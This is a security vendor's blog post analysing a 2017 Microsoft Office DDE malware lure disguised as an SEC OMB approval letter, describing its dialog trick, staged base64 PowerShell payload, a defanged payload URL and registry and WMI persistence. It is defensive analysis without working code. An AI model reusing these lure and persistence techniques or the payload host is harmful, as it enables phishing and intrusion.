Microsoft Office DDE SEC OMB Approval Lure

Posted on 2017-10-14 by Pedram Amini

In reviewing the results of our Microsoft Office DDE malware hunt, (Microsoft_Office_DDE_Command_Execution.rule) we came across an interesting lure posing as an SEC Office of Management and Budget (OMB) approval letter. The sample utilizes some tricks to increase chances of successful exploitation. We'll walk through the dissection of the components in this post. To follow the highlights of the conversation on Twitter, see the following moment:

The author of this payload applies a trick here in referencing the Powershell binary by way of Microsoft Word (first highlight). This results in a more friendly dialog for the user:

Dialogue Trick

A potential victim is more likely to select 'Yes' here when seeing Microsoft Word as the reference binary, versus Powershell.exe. The payload is behind a Google shortened URL. This is nice because we can append a + to that URL to see how prevalent this sample is:

Google URL Stats

Seems like it's not popular at all. It may be worth keeping an eye on this page. The URL behind the shortener is:

http://ipangea[.]com/wp-content/themes/ps1.txt

Snag that and you'll find base64 encoded content that appears to be hosted on a compromised Wordpress page (this is pretty common):

The payload established persistence via multiple locations in the Windows Registry. Establishes persistence via WMI to execute during Windows Logon. There's also a new payload to decode, same drill. Here's what we get:

You'll notice a number of base64 encoded strings above. No doubt, this is another evasion tactic. If you dig into those, you'll see they are all password protected via HTTP authentication. InQuest detects exploitation of these and other DDE attacks via our Deep File Inspection (DFI) stack and signature MC_Office_DDE_Command_Exec (event ID 5000728) released on October 10th, 2017. Our DFI stack is what's responsible for peeling away the variety of layers typically present in malicious content. The process is recursive and a variety of techniques are applied in parallel to expose all embedded layers. For more information about DFI, see www.InQuest.net or reach out to us directly.